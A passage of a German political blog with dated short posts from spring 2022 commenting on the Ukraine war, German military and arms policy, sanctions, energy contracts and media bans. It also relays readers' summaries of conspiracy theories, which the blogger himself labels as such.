3. Der Lagebericht ist für die schnelle Eingreiftruppe der Nato gedacht. Wozu braucht bitte die schnelle Eingreiftruppe der Nato einen Cyber-Lagebericht? Noch dazu einen aus Deutschland?!
Das ganze ist eine dermaßene Farce, dass der Rechnungshof am Ende im Wesentlichen zusammenfassend nur eine Sache kritisiert. Dass die früh im Raum stehende Entscheidung, das Projekt abzubrechen, voreilig revidiert worden sei.
Doktor House bitte in die Brandwundenabteilung, Doktor House bitte!

Sun Apr 3 2022

[l] Ich bin etwas erstaunt über die universelle Erschütterung über die toten Zivilisten in der Ukraine. Was habt ihr denn gedacht, was das heißt, wenn Russland eine Invasion in der Ukraine macht? Dass da nur Lackkratzer entstehen?
Wir bequemen Westeuropäer haben einfach seit dem 2. Weltkrieg keinen Krieg mehr gesehen. Wir haben gar kein Gefühl mehr dafür, wie eine Stadt aussieht, wenn da russische Panzer durchgerollt sind und Häuserkampf gekämpft haben.
Heutige Waffensysteme sind locker eine Größenordnung zerstörerischer als die von damals. Bilder von zerstörten Häusern sind absolut zu erwarten gewesen. Ich hatte ehrlich gesagt mit noch krasserer Zerstörung gerechnet.
Jetzt ist dieses Video von den toten Zivilisten aufgetaucht. Ändert das irgendwas? Ich finde nicht.
Die Russen sind böse, dass sie sowas machen? Wussten wir das letzte Woche etwa noch nicht?!
Ja aber jetzt ist wenigstens die moralische Betrachtung klarer! Ist sie?
Ich finde nicht. Mich stört das gewaltig, wie viele Leute da in moralischen Kurzschlussreaktionen Absolute vertreten.
OK, nehmen wir mal an, die Bilder sind nicht gefälscht, und sie zeigen tatsächlich zerfetzte unschuldige ukrainische Zivilisten. Nicht dass irgendjemand von uns das tatsächlich beurteilen könnte, ob das so ist. Aber nehmen wir das mal an.
Option 1: Russland ist fies und gemein, die Ukrainer sind edel und gut, wir sollten denen Waffen liefern. Es ist moralisch verwerflich, dass wir ihnen nicht schon früher mehr Waffen geliefert haben.
Option 2: Russland ist fies und gemein, die Ukrainer sind edel und gut, und weil wir ihnen Waffen geliefert haben, und die Russen nicht einfach durchmarschieren konnten, gibt es jetzt lauter zivile Opfer. Es ist moralisch verwerflich, dass wir ihnen Waffen geliefert haben.
Ja Scheiße, oder? Merkt ihr selbst?
Und natürlich kann man das auch in der entgegengesetzten Situation genau so aufspannen. Nehmen wir mal an, wir hätten keine Waffen geliefert, die Ukraine wäre in zwei Tagen gefallen, und die Russen hätten da jetzt die Hölle auf Erden veranstaltet. Irgendwelche Warlords würden marodieren und brandschatzen, vergewaltigen. Wie ist unser Handeln dann zu beurteilen?
Da kann man wieder beide Seiten vertreten. Entweder man sagt, wir hätten Waffen liefern sollen. Oder man sagt, in zerbombten Ruinen unter russischen Warlords leben ist weniger übel als tot sein.
Man kann natürlich auch argumentieren, dass das nicht uns zusteht, das für die Ukrainer zu entscheiden, was die weniger schlimm finden.
Ich finde die Situation alles andere als klar, insbesondere aus einer moralischen Warte heraus.
Aber ich finde es auch alles andere als klar, dass man einem Land zu Hilfe eilen muss, das angegriffen wird. Machen wir sonst auch nicht. Oder sieht jemand die Bundeswehr im Jemen heroisch die Saudis abwehren?
Erinnert ihr euch an den Einsatz der Bundeswehr, als der Irak im Iran einmarschierte? Oder wie wäre es mit Syrien. Libyen. Israel?
Bisher war die Policy der Bundesrepublik Deutschland relativ klar: Die Bundeswehr ist für die Abwehr feindlicher Angriffe auf Deutschland vorgesehen, und darf im Krisenfall auch für Dinge wie Deichbau und Covid-Impfungen eingesetzt werden. Aber im Ausland Krieg führen darf sie nicht. Unsere Policy ging (auf dem Papier) sogar noch weiter: Keine Waffenlieferungen in Krisengebiete (erst recht nicht in Kriegsgebiete).
Könnt ihr mal bitte alle mit dem Gaslighting aufhören, dass das schon immer unsere Politik war, angegriffene Länder zu verteidigen? War es nie, und aus gutem Grund! Jeder Invasor wird vorher bemüht sein, seine Invasion als humanitäre Aktion oder als Verteidigung gegen eine drohende Invasion in die Gegenrichtung darzustellen. Daher reicht das als Argument eben nicht aus, und schon mal gar nicht für ein Land, dass zwei Weltkriege ausgelöst hat. Einen davon mit vorgeschobener Abwehr eines Angriffs, falls ihr euch erinnert.
Deutschland sollte nie wieder irgendwo Krieg führen! So hat man mir das in der Schule erklärt, und ich fand das immer eine gute Policy.
Wenn es einen gemeinsamen Nenner gibt bei den Kriegen in meiner Lebenszeit, dann dass wir praktisch jedesmal verarscht wurden. Die Begründungen waren Lügen, die Durchführung war bei weitem nicht so chirurgisch wie behauptet, und am Ende klebte das Blut von Zivilisten an unser aller Händen. Ich finde, daraus sollte man die Lektion ziehen, dass man einfach gar nicht an Kriegen teilnimmt.
Deutschland sollte das wie Kuba machen. Wenn irgendwo was brennt, schicken die immer Ärzte und medizinische Materialien. Ergebnis: Wenn du irgendwo in einer Krisensituation Leute mit kubanischer Flagge siehst, dann weißt du: Das sind nicht die Bösen.
Das würde ich mir auch für die deutsche Flagge wünschen.
Update: Die "Beweise" dafür, dass das Video gefälscht ist, überzeugen mich alle nicht. Ich sehe auch keinen Grund für Zweifel, dass da tote Zivilisten auf der Straße liegen. Mir geht es hier nicht darum, die Fakten festzustellen. Das können wir alle nicht beurteilen. Ich glaube im Zweifelsfall Ennos Vor-Ort-Berichterstattung.
Mir ging es hier aber nicht um die Frage, ob da wirklich Zivilisten liegen. Mir ging es darum, dass dadurch die moralische Beurteilung der Lage nicht plötzlich glasklar und einfach ist, und schon gar nicht die Frage, was Deutschland tun sollte. Da kann man verschiedene Positionen zu haben.
Wenn ihr genau hinschaut, werdet ihr überrascht feststellen, dass ich mir keine davon zueigen gemacht habe. Ich finde auch nicht, dass meine Meinung in dieser Sache eine Rolle spielt. Also für irgendjemanden außer mir selbst. Genausowenig wie eure Meinung für mich eine Rolle spielt.
Update: Ein Leser weist darauf hin, dass Kuba nicht ausschließlich Ärzte und Sanitäter geschickt hat. Das wusste ich in der Tat nicht. Wieder was gelernt.
Update: Ein Leser fragt nach Option 3: Wir liefern Waffen an die Ukraine, die bewaffnet damit Zivilisten. Sind wir jetzt Schuld am Tod von Zivilisten? Oder waren das dadurch Kombattanten und keine Zivilisten mehr? Waren diese Zivilisten bewaffnet?
Ich habe darauf natürlich auch keine Antwort, genau wie ich auf die anderen Optionen keine Antwort habe. Muss jeder für sich selbst entscheiden.
[l] Nancy Faeser will Hackback und braucht dafür eine Grundgesetzänderung. Hackback ist die Idee, dass man "zurückhacken" kann, wenn einen jemand zu hacken versucht.
Ich hatte dazu ein paar Folien gemacht. Ich brauchte nicht viele (für meine Verhältnisse), denn die Idee ist wirklich offensichtlich schlecht und wird nur von uninformierten Orangutans verbreitet, die sich auf die Brust kloppen für eine weiterführende Innenpolitik halten.
Update: Ein Leser korrigiert: Gorillas kloppen auf die Brust, Orangutans brüllen.

Sat Apr 2 2022

[l] Ja, das mit der Abfrage der Location-Daten war natürlich mein Aprilscherz.
Ich hatte mir Sorgen gemacht, dass das zu subtil ist. Dass ihr alle konditioniert seid, das wegzuklicken, ohne es zu merken.
Freut mich, dass es noch nicht so schlimm ist.
Falls jemand von euch Bock hat, fürs nächste Jahr eine Cookie-Terror-Wall aus der Hölle zu basteln, mit einmal allen Dark Patterns, dann meldet euch doch bitte. :-)
Update: Eine handliche Übersicht über Dark Patterns findet ihr hier und Inspiration für Standardfehler findet ihr hier.

Wed Mar 30 2022

[l] Ein Leser schickt mir zu diesem Video eine übersetzte Zusammenfassung zu. Zu dem Video erstmal:
Das ist der neue Kanal von diesem geschlossenen unabhängigen Radiosender, der jetzt in Rest-Besetzung noch auf Youtube existiert. Dort streiten sich aber die beiden Gäste ziemlich schnell auf Russisch.
Und jetzt zum Inhalt:
Ich habe diesmal eine wunderschöne Verschwörungstheorie für dich, also eine echte! Sogar mehrere! Sie geht zurück auf die Parteiführung der russischen kommunistischen Partei,
https://en.wikipedia.org/wiki/Maksim_Shevchenko_(journalist)
und zwar hat er sich den Unsinn mit dem Ukraine-Krieg angeschaut, den sich noch immer niemand rational erklären kann und sich ersatzweise an Putins Psychoanalyse versucht wird, dabei rein geopolitisch-ökonomisch betrachtet, Annahmen gemacht und – wie sich das für einen guten Marxisten-Leninisten gehört – dabei eine imperialistische Verschwörung gefunden!
Die Annahmen wären, die ich nicht beurteilen kann aber die nach anderen Expertenmeinungen eher nicht stimmen: Die EU bleibe auch langfristig auf das Gas und das Öl angewiesen; und die Bewertung des Boykotts und der Sanktionen sei zu West-zentrisch und nach dem Krieg würden im Konflikt neutrale Länder gut genug die Knappheiten auffangen.
Apropos Krieg: Das Geschacher mit dem Wort „Spezialoperation“ hätte ihm nach auch primär nicht Propagandagründe, sondern rein kapitalistische, nämlich die Rohstofflieferungen an die EU, die ja ungehindert weiter fließen, bezahlt werden (demnächst womöglich über Kasachstan u.ä. in Rubel) inkl. Transitgebühren an den Nicht-Kriegs-Gegner. Das wäre vertraglich nicht mehr möglich, wäre offiziell Krieg.
(Habe ich natürlich nicht überprüft, aber klingt schlüssig.)
Zurück zur versprochenen Verschwörungstheorie.
Diese Verschwörung nämlich würde bestehen zwischen USA und China, die für eine Erhöhung der Stabilität der Welt diese auf weniger Pole verteilen wollten, nämlich ohne eine womöglich perspektivisch unabhängige EU. Gegen die die USA als Bündnispartner ja nicht direkt vorgehen können. Dafür wurde Putin gebeten, den Bad Guy zu spielen, damit die EU darauf reagieren und für auch sich schädliche Sanktionen verhängen muss. Diese zerstören (du verlinktest auch selbst mal eine dahingehende Grafik) die obere Mittelschicht in Russland, die nämlich tendenziell in Opposition zu Putin und für Nawalny steht, und andere störende Elemente. Putin kann sein System aufbauen, das aus ihm, seiner Umgebung, dem notwendigen Verwaltungsapparat und dem einfachen Volk besteht (verweisend auf ein Buch, das Putin wohl gern zitiere und sich davon inspiriert fühle). Also zusätzlichen Dank könnte er bei den großen beiden dann mit am Tisch sitzen und sich wichtig fühlen.
Und weil dieser Mensch so großartig ist, hatte er noch eine weitere Verschwörungstheorie!
Und zwar der Maidan-Putsch in der Ukraine sei gar nicht vom imperialistischen Westen (oder gar genuin vom Volk, aber wer glaubt das schon!) sondern von Russland selbst organisiert/begünstigt worden, um nämlich eine nationalistische Regierung zu installieren und den russischsprachigen Bevölkerungsteil zu marginalisieren, denn: Wäre das Land, wie es sein sollte, zweisprachig mit einer lauten russischen Stimme, dabei aber erfolgreich und demokratisch, wäre es quasi ein Alternativ-Russland und damit für das Putin-Russland ein Problem.
Ich finde das ja immer wieder hochinteressant, was für Verschwörungsgeschichten sich Leute aus fremden Ländern erzählen. Und zwar völlig unabhängig von der Glaubwürdigkeit des Inhalts. Daran kann ich als Außenstehender sehen, was die für Dinge erklären müssen, und welche Fragen die sich möglicherweise gar nicht erst stellen. (Danke, Sergej)

Tue Mar 29 2022

[l] Berlin hat endlich auch einen Problembär! Er steht vor einer Bibliothek und hat ein Z auf den Bauch gemalt!
Da muss man dringend etwas tun!1!!
Ihr werdet es beim Wort Biliothek schon geahnt haben. Der Bär hat auch alle anderen Buchstaben aufgemalt. Das ist ein Bibliotheks-Bär. Der steht da schon länger und soll Kinder anlocken.
[l] Eine Biowaffen-Testinsel in Schottland steht in Flammen.
The 25-year-old described the scene as "apocalyptic," and said it looked like "hell fire".
"There was a string of flames around the whole circumference of the island," she said.
Die Insel wurde im 2. Weltkrieg für Anthrax-Experimente genutzt, gilt aber seit 1990 offiziell als Anthrax-frei.
Na, hatte das jemand auf der Apokalypse-Bingokarte?
Update: Tom Scott hat ein Video über die Insel gemacht.

Sat Mar 26 2022

[l] Wenn ihr wissen wollt, was die Kids der Generation Zoom und Software-Gamification für Skills gelernt haben: Dieser Twitter-Thread erklärt es anschaulich.
Die Kids haben eine Lese-Software gekriegt. Da sammelt man Punkte, indem man Bücher liest, und am Ende stellt die Software ein paar Fragen. Wenn du die richtig beantwortest, kriegst du Bonuspunkte. Die Kids haben also gelernt, dass sie einfach der Software sagen, sie hätten 100 Bücher gelesen, und keine der Bonusfragen beantworten.
Was kannst du mit den Punkten machen? Du kannst deinem Avatar Gegenstände freischalten.
Was haben die Kids also gemacht, als sie gemerkt haben, dass alle bescheißen? Sie haben festgestellt, dass alle Kids dasselbe Passwort haben, und haben sich gegenseitig in die Accounts eingelogt und anderen Kids die Punkte für die hässlichsten Items ausgegeben.
Wer fand Gamification nochmal eine gute Idee?

Fri Mar 25 2022

[l] Noch ein Leserbrief zum Öl- und Gaseinkauf (Kontext, mehr Kontext).
Vielleicht hast du in dem Artikel ein paar Sachen durcheinander gebracht. Ich bin im Gas-Geschäft tätig. Mit Öl habe ich nichts am Hut. Die Gas-Einkaufsverträge mit Gazprom bestehen direkt mit deutschen Großhändlern (VNG, Wingas, Uniper). Die Strukturen sind komplex (die initialen Verträge aus den Anfangsjahren für West-Deutschland wurden von einem Konsortium verhandelt mit einem Verhandlungsführer). Ich kenne die aktuelle Situation nicht. Mein letzter Kontakt zum Einkauf liegt ein wenig zurück. Die Konsortiumsverträge wurden sicher leicht umgestaltet. Aber eine Wingas wird als Tochter der Gazprom bestimmt nix über irgendein Schweizer Unternehmen abwickeln.
Ohne zuviel zu sagen: ich habe nur DM-Preise bzw. die simple Euro-Umrechnung gesehen. Noch viel wichtiger: die Preisbildung dieser Altverträge ist komplex, denn es sollte damals insbesondere eine langfristige faire Preisbildung ermöglicht werden. Also gibt es zum Beispiel Preisanpassungen auf Basis von Endverbraucherpreisen, auf Basis von Gehaltsindex beim stat. Bundesamt und so weiter. Bei der Risikoanalyse haben wir alle diese Aspekte betrachtet. Wechselkurs-Themen gab es beschaffungsseitig Richtung Russland in meiner Erinnerung nicht.
Allerdings habe ich in dem Projekt mit der höchsten Nähe zu den direkten Einkaufsverträgen direkt nach Russland (dem Konsortiumsführer) kein Risikomanagement an den Verträgen gemacht. Ich bin mir aber Recht sicher, dass der Konsortiumsführer so ein Preis-Risiko an die anderen Partner durchgereicht hätte.
Die Umstellung der Altverträge auf Rubel ist aber auch nicht so simpel. Es gibt "offene" Verhandlungen über Anpassungen der Preisbildung alle 4 Jahre. Wenn die Verhandlungen scheitern, gilt grob gesagt die alte Preisbildung weiter. Wenn eine Partei bestimmte Änderung will, muss die andere Partei zustimmen, d.h. man muss sich die Zustimmung "erkaufen".

Wed Mar 23 2022

[l] Stellt euch vor, ihr kämpft in der Ukraine, und man drückt euch eine Panzerabwehrrakete in die Hand. Ihr habt keine Ahnung, wie man die bedient. Was macht ihr?
Na ihr guckt das Unboxing-Video auf Youtube!
Das war ja fast klar, dass die Ukrainer da Trainingsvideos online haben würden, nachdem es neulich schon hieß, dass die ukrainischen Flüchtlingskinder hier erstmal nach einem WLAN gefragt haben, weil die Ukraine Online-Schule und 1200 Schulbücher online hat für ihre Kinder. Die Kinder dachten sich dann, sie machen hier einfach nahtlos weiter mit ihrer Schule. Da haben sie natürlich ihre Rechnung ohne die deutsche Verlags- und Urheberrechtsmafia gemacht. Wo kämen wir da hin, wenn Kinder einfach Zugang zu Bildung hätten!
Update: Handbuch zum Stinger verlegt? Youtube has your back.
Handbuch zum Javelin verlegt? Kein Problem!
Jetzt müssen wir nur noch sicherstellen, dass niemand eine nackte Brust sieht auf Youtube. Das würde die Kinder gefährden.

Mon Mar 21 2022

[l] Infrastrukturapokalypse: Nord-Ostsee-Kanal gesperrt.
Softwarefehler. Kann man nichts machen.
So langsam wird dieser Paywall-Scheiß echt nervig. Ich hatte bestimmt ein halbes Dutzend Einsendungen hierfür, die alle nicht blogbar waren, weil sie hinter eine Paywall führten. Wir hatten echt goldene Zeiten. Bis wir sie uns selbst kaputtgemacht haben.

Wed Mar 16 2022

[l] Hey, wie trainiert man eigentlich Folterknechte?
Hier ist, was die Amerikaner gemacht haben:
A detainee at a secret CIA detention site in Afghanistan was used as a living prop to teach trainee interrogators, who lined up to take turns at knocking his head against a plywood wall, leaving him with brain damage, according to a US government report.
Seid ihr eigentlich auch so froh, dass ihr auf Seite der Guten kämpft?

Tue Mar 15 2022

[l] Leserbrief zu einer ganz anderen Sache:
in der vergangenen Woche hatte ich das Buch "Verschwunden - Was geschah mit Flug MH 370?" der französischen Autorin Florence de Changy gelesen. Die Dame arbeitet seit ca. 20 Jahren unter anderem als Korrespondentin für Le Monde und erscheint zumindest nicht hochgradig unseriös. Sie hat sich sieben Jahre lang mit dem Schicksal des Flugs befasst, der am 07./08. März 2014 en route von Kuala Lumpur nach Peking verschwunden ist, und kommt zu den folgenden Schlüssen:
- Die Behauptung, der Flieger habe über Malaysia zwischen den Wegpunkten ITARI und BITOD einen U-Turn nach Südwesten gemacht und sei dann in Richtung Indischer Ozean geflogen und dort ins Meer gestürzt, als der Sprit leer war, lässt sich nicht beweisen. Angebliche Belege in diese Richtung sind nicht belastbar; so könne man die Trümmerteile, die an der afrikanischen Ostküste gefunden wurden, mangels genauer Kennzeichnung genauso gut auch anderen Flugzeugen zuordnen; die Beobachtungen eines niedrig fliegenden Flugzeugs über den Malediven beruhen auf Verwechslungen mit anderen Flugzeugtypen und die INMARSAT-Pings, die aufgefangen wurden, sind gefälscht. Letztlich dienten diese Informationen dazu, überaus aufwändige Suchaktionen in der Nähe der Australischen Westküste zu veranlassen, um vom tatsächlichen Absturzort im südchinesischen Meer abzulenken.
- Der Pilot hat mit dem Absturz nichts zu tun, er war ganz im Gegenteil ein leuchtendes Vorbild seines Berufsstands. Es handelt sich aber um ein gängiges Muster, bei derartigen Katastrophen zunächst den Piloten verantwortlich zu machen, da es zu spät für ihn ist, sich zu verteidigen, man ihm im Nachhinein "Beweise" unterschieben kann und Politik und Flugzeugindustrie im besten Fall aus der Sache raus sind oder zumindest mal Zeit gewonnen haben.
- Viel naheliegender (und auf weniger unbewiesenen Annahmen beruhend) ist, dass das Flugzeug seinen Kurs auch nach der letzten Funkverbindung seine Route über Vietnam nach Nordosten hinweg fortgesetzt hat.
- Eine abschließende Erklärung könnte sein, dass jemand unbedingt verhindern wollte, dass eine Fracht, die in Kuala Lumpur in die 777 geladen wurde, ihr Ziel in China erreicht (verschieden Unstimmigkeiten in den Frachtpapieren deuten darauf hin, dass im sich Laderaum falsch deklarierte Güter befanden). Dabei könnte es sich beispielsweise eine in Pakistan abgefangene US-Drohne handeln, die die Amerikaner nicht unbedingt in Peking sehen wollten. Der Plan war, nach dem Passieren von BITOD eine Zwischenfall zu organisieren, um die Maschine zu einer Zwischenladung zu zwingen und die Ladung bei dieser Gelegenheit aus dem Frachraum rauszuholen. bevor man die Maschine nach China weiter fliegen lässt. Um das zu ermöglichen, haben AWACS-Flugzeuge der Amerikaner, die nachweislich in der Gegend stationiert waren, den Funkverkehr zwischen der Maschine und der Bodenstation gestört. Dann ist etwas schief gelaufen, vielleicht, weil der Kapitän sich pflichtbewusst geweigert hat, mitzuspielen. Beim anschließenden Versuch der Amerikaner, ihn zu "überzeugen", ist der Flug über dem südchinesischen Meer abgestürzt, was so nicht geplant war.
- Die Fälschung der Satelliten-Pings als wichtigster "Beweis", dass das Flugzeug in Richtung Indischer Ozean abgedreht ist, ist plausibel, da die Amerikaner der Hauptkunde von INMARSAT sind.
- Malaysia und China (die meisten Passagiere waren Chinesen) waren von dem Vorfall alles andere als begeistert. Um beide Nationen zu beschwichtigen, hat Obama als Malaysia in den folgenden Monaten gleich zweimal besucht (seit Jahrzehnten der erste Besuch eines US-Präsidenten), den malayischen Machthaber zum Golfen nach Hawaii eingeladen und Malaysia mit Rüstungsprojekten unterstützt. Bei den Chinesen haben die Amerikaner sich revanchiert, indem sie sich bei der Expansion der Chinesen im Bereich der Paracel- und Spratley-Inseln nicht so genau hingeschaut haben mit Kritik auffällig zurück gehalten haben.
- Trump, der mit den Geheimdiensten ja nicht so dicke war, haben sie nicht die Wahrheit erzählt, sondern ihn die "offizielle" Version glauben lassen.
So weit. Ein interessantes und sehr spannend geschriebenes Buch. Zumindest eine Diskussionsgrundlage.
Ah, die Verschwörungstheorie hatte ich noch gar nicht gehört. (Danke, Axel)

Mon Mar 14 2022

[l] Was macht die Bundeswehr mit den 100 Milliarden?
Es gab da mal ein grandioses Video, das Sun gemacht hat, als sie ihr Java-Verfahren gegen Microsoft gewonnen hatten. Damals musste Microsoft auch ein paar Fantastilliarden Strafe an Sun zahlen.
Das Video hatte dann die Form: Hmm, wir könnten 100.000 Porsches kaufen. (zeigt einen Stapel Porsche 911). Oder vielleicht 10.000 Einfamilienhäuser. (zeigt einen Stapel Häuser). Oder zwei Space Shuttles. (zeigt zwei Space Shuttles).
Oder einen IBM Support Contract (zeigt einen Staubsauger, der Geld aufsaugt) :-)
Vor der Wahl steht jetzt auch die Bundeswehr.
Ich möchte an der Stelle noch einmal lobend hervorheben, wie effizient McKinsey die Bundeswehr abgerüstet hat. Die Bundeswehr hat ja kein Null-Budget im Moment. Da sind auch 50 Milliarden oder so versickert über die letzten Jahre.
Die moderne Alternative zum IBM Support Contract ist also der McKinsey-Beratervertrag.
Oder man könnte zwei Space Shuttles kaufen, klar. Nee, warte. Nicht Space Shuttles. F-35 Tarnkappenjets.
Gut, die starten nicht, wenn nicht dein freundlicher Kontaktoffizier aus Amerika den Schlüssel umdreht, und Ersatzteile und Wartung kriegt man auch nur von den USA, aber die Amerikaner sind ja auch unser Freund!1!!
Womit bestücken wir das dann, fragt ihr? Na mit amerikanischen Atombomben natürlich!
Wieso sollen wir dann dafür bezahlen, wenn das amerikanische Hardware mit amerikanischen Bomben ist?
Beats me!

Sun Mar 13 2022

[l] Ein Leser leitet mir die deepl-übersetzten Ausführungen eines russischen Journalisten weiter, die ich hier aber lieber nicht verlinken will, weil die von einer russischen Domain kamen. Nicht dass mein Link den in den Knast bringt.
Jedenfalls, der Journalist meint, man muss zu den Sanktionen die Gesellschaft nach Einkommen segmentieren:
1. Die Oberschicht (etwa 0,5%). Privatjets, Anwesen und Vermögen im Ausland. Sind ein bisschen von den Sanktionen betroffen, aber keineswegs existenzbedrohend.
2. Die obere Mittelschicht (eta 4,5%). Besitzen ein Haus oder eine Wohnung, fahren BMW, machen Urlaub im Ausland. Die sind sehr stark von den Sanktionen betroffen.
3. Mittelschicht (etwa 15%). Einkommen in Rubel, Konsumgüter meistens importiert, zahlen Hypothek ab, fahren Hyundai oder Kia, machen jährlich Urlaub in der Türkei, letztes Mal auf der Krim. Die sind ebenfalls stark von den Sanktionen betroffen.
4. Untere Mittelschicht (etwa 30%). Alle Einkünfte in Rubel, Verbraucherkredite, würden sich gerne eine Hypothek leisten können, fahren Lada oder chinesische Autos, machen alle 3-5 Jahre Urlaub in der Türkei oder Ägypten, sonst bei Verwandten in Russland. Auswirkungen der Sanktionen: mittel.
5. Unterschicht (etwa 40%). Alle Lebensmittel hausgemacht, alle Einkünfte Rubel, Mikrokredite, Abhängig von einem Gemüsegarten und einem Netz von Verwandten und Freunden. Ferien auf der Datscha oder Besuch bei Verwandten. Auswirkungen der Sanktionen: gering.
6. Unterschicht (etwa 10%): Menschen unterhalbt der Armutsgrenze. Auswirkungen der Sanktionen: keine.
Mit anderen Worten: Zählt man das zusammen, kommt man direkt auf die 80%, die von den Sanktionen nur mittel bis gar nicht betroffen sind, und daher möglicherweise weiterhin hinter Putin stehen.
Da trübt uns einfach unsere eigene Demografie den Blick. Wir sehen die Welt aus Sicht von jemandem in den oberen Kategorien, weil wir selbst in den oberen Kategorien sind, und nehmen daher an, die Sanktionen kloppen voll rein. Das könnte ein folgenschwerer Irrtum sein.

Fri Mar 11 2022

[l] Ich hatte neulich eine Geschichtsstunde bei PBS Frontline verlinkt, mit Julia Ioffe. Das Video war von 2017 oder so. Jetzt gibt es ein frisches Video mit ihr, das ich ebenso empfehlenswert finde.
Ein paar der Punkte daraus: Putin glaubt offenbar, dass sein Auslandsgeheimdienst seine Pläne an die Amis geleakt hat, und hat daher den Chef von dem Dienst öffentlich vorgeführt.
Sie erzählt ein bisschen von Covid in Russland. Die haben offenbar per capita eine der höchsten Sterberaten der Welt. Putin fand offenbar, dass die Wirtschaft einen Lockdown nicht überleben würde, und daher gab es keinen. Die Bürger haben sich nicht isoliert, durften sich nicht isolieren, aber Putin hat sich massiv isoliert. Wer ihn besuchen wollte, musste zwei Wochen in Quarantäne in einem extra dafür reservierten Hotel, und zwar bis hoch zum Präsidenten von Kasachstan.
Sie meint jetzt: Der Lockdown hat uns allen mental zugesetzt, aber wir waren alle nicht so stark isoliert wie Putin, der da fast schon Assange-Style in Isolation war.
Einige fingen zu häkeln an. Putin hat halt eine Invasion in der Ukraine gemacht. Nach zwei Jahren Isolation ist der jetzt halt durch, so ihre Theorie.

Wed Mar 9 2022

[l] Wollt ihr euch mal über Krisen-PR fortbilden?
Da gibt es gerade eine großartige Gelegenheit. Da sind nämlich ein paar SMSsen und Chatverläufe der zuständigen Ministerin geleakt. Und dreimal dürft ihr raten, was die primäre Sorge war!
Spiegel war zuständige Umweltressortchefin in Rheinland-Pfalz. Sie habe bereits am Morgen des 15. Juli, als das Ausmaß der Katastrophe bekannt wurde, an ihre Mitarbeiter geschrieben: „Das Blame Game könnte sofort losgehen, wir brauchen ein Wording, dass wir rechtzeitig gewarnt haben, wir alle Daten immer transparent gemacht haben, ich im Kabinett gewarnt habe, was ohne unsere Präventionsmaßnahmen und Vorsorgemaßnahmen alles noch schlimmer geworden wäre etc.“.
Wir brauchen ... nicht Rettungskräfte, nicht Notunterkünfte, keinen Wiederaufbauplan. Nein. Wir brauchen ein Wording, dass wir nicht Schuld waren!
„Anne braucht eine glaubwürdige Rolle.“ Vorgeschlagen wurden medienwirksame Ortstermine: „Anne bei Reparaturarbeiten, bei Hochwasserschutzprojekten, dort wo neue Gefahren drohen, Besuch mit Journalisten bei Hochwassermeldezentren.“
Nur falls jemand dachte, bei den Grünen gäbe es Idealisten, da liefe das anders.

Sat Mar 5 2022

[l] Im Moment gibt es lauter Stories über Firmen, die sich aus Russland zurückziehen. In Protest gegen den Krieg. Es gibt sogar eine Story, dass ukrainische Einzelhandelsketten Coca Cola aus dem Sortiment nehmen, weil Coca Cola weiterhin in Russland verkauft.
Ich frage mich gerade, was jetzt die ganzen deutschen Firmen machen, die Outsourcing nach Russland oder die Ukraine gemacht haben.
Polen und Rumänien sind in meiner persönlichen Erfahrung bisher häufiger vertreten, aber ich glaube es gibt da auch recht viele Projekte mit Programmierern aus der Ukraine und Russland. Die dann natürlich VPN-Zugang haben.
Machen die sich jetzt Sorgen, die deutschen Firmen?
[l] BBC, CNN, CBS, ARD und ZDF stellen Berichterstattung aus Russland ein. Hintergrund ist ein russisches Gesetz, das kritische Berichterstattung über den Ukrainefeldzug unter Strafe stellt.
Jetzt brauchen die Russen nur noch ein Gulag auf Kuba und ein paar Folterknäste in anderen Ländern, Drohnenmorde, Rendition-Flüge, dann haben sie aufgeholt. Oh und natürlich Militärbasen in aller Herren Länder, versteht sich.
Ein Spitzelsystem ala ECHELON / Snowden-Aufdeckungen werden sie ja wohl haben, so als aufstrebende Supermacht.
Wieviele Geheimdienste haben die Russen eigentlich? Können die mit dem Marktführer mithalten?
Ich finde das ja immer schade, dass nie jemand in der Disziplin Anstand und Humanismus antritt. Wobei. Vielleicht gab es da ja welche von, aber die sind halt alle tot jetzt, von Bully-Staaten plattgemacht.

Thu Mar 3 2022

[l] Warum haben die Russen eigentlich in der Ukraine die Mobilfunknetze noch nicht kaputtgemacht?
Weil sich die prima als Zielsuchsystem eignen, solange die Generation Selfie sich damit aus dem Genpool darwiniert.
Update: Ein Biologe merkt an, dass der Fachbegriff nicht darwinieren sondern wegmendeln ist. :-)
Update: Wenn ihr mal die Fensterform vergleicht, wird euch auffallen, dass das nicht dieselben Fenster sind.

Wed Mar 2 2022

[l] Ich finde das übrigens nicht gut, dass RT überall rausgeflogen ist.
Selbst unter der Annahme, dass RT nur Propaganda sendet, ist es trotzdem wichtig, dass man das gucken kann. Selbst im schlimmsten kalten Krieg haben wir im Westen den Schwarzen Kanal gucken können.
Warum ist das denn wichtig?
Na woran erkennst du denn die Qualität unserer Medien, wenn du nicht einen Vergleichswert hast?
Nehmen wir mal an, unsere Medien berichten, dass die Ukraine und Russland an den Verhandlungstisch zurückkehren. Wonach kalibriert ihr denn eure Erwartungshaltung, wenn ihr nicht wisst, was die Gegenseite ihrer Bevölkerung in Aussicht gestellt hat?
Verhandlungen sind natürlich immer besser als Kriegshandlungen, aber ich würde ja schon gerne einschätzen können, ob hier jemand auf Zeit spielt oder ob es da realistisch was zu verhandeln gibt.
Selbst wenn ich der Tagesschau glaube, wenn sie mir sagen, dass es bei den Verhandlungen nicht voran geht, ist das ja nur die halbe Story.
Insofern: "Feindmedien" gucken ist richtig und wichtig, gerade im Krieg. Lügen hören ist immer noch besser als gar nichts hören.
Außerdem finden wir es widerwärtig, wenn Russland die Deutsche Welle blockiert. Weil es unsere Werte sind, angeblich, dass man ein Recht haben sollte, sich zu informieren, auch im Ausland, auch wenn die Regierung das für Lügen hält, selbst wenn die Regierung Recht hat und da Lügen dabei sind. Im Übrigen, wenn wir was gegen Lügen in den Medien haben, wieso gibt es dann die "Bild" noch?
Aktuell gibt es z.B. Meldungen, dass russische Eltern aus den Medien erfahren, dass ihre Kinder in der Ukraine im Krieg sind und dann, dass sie dort gefangen wurden. Wenn das stimmt, muss die russische Regierung darauf reagieren. Das hätte ich gerne sehen können, ob sie das tun.
Mein Eindruck ist ja gerade, dass auf Twitter eine Generation heranwächst, die unter "verhandeln" versteht, dass man hingeht, seine eh schon zigfach geäußerten Standpunkte verkündet, und dann den Gegner wegblockt, bevor er antworten kann. Die Antwort kommt ja von den BÖSEN, die kann nur böse, fies und gemein sein.
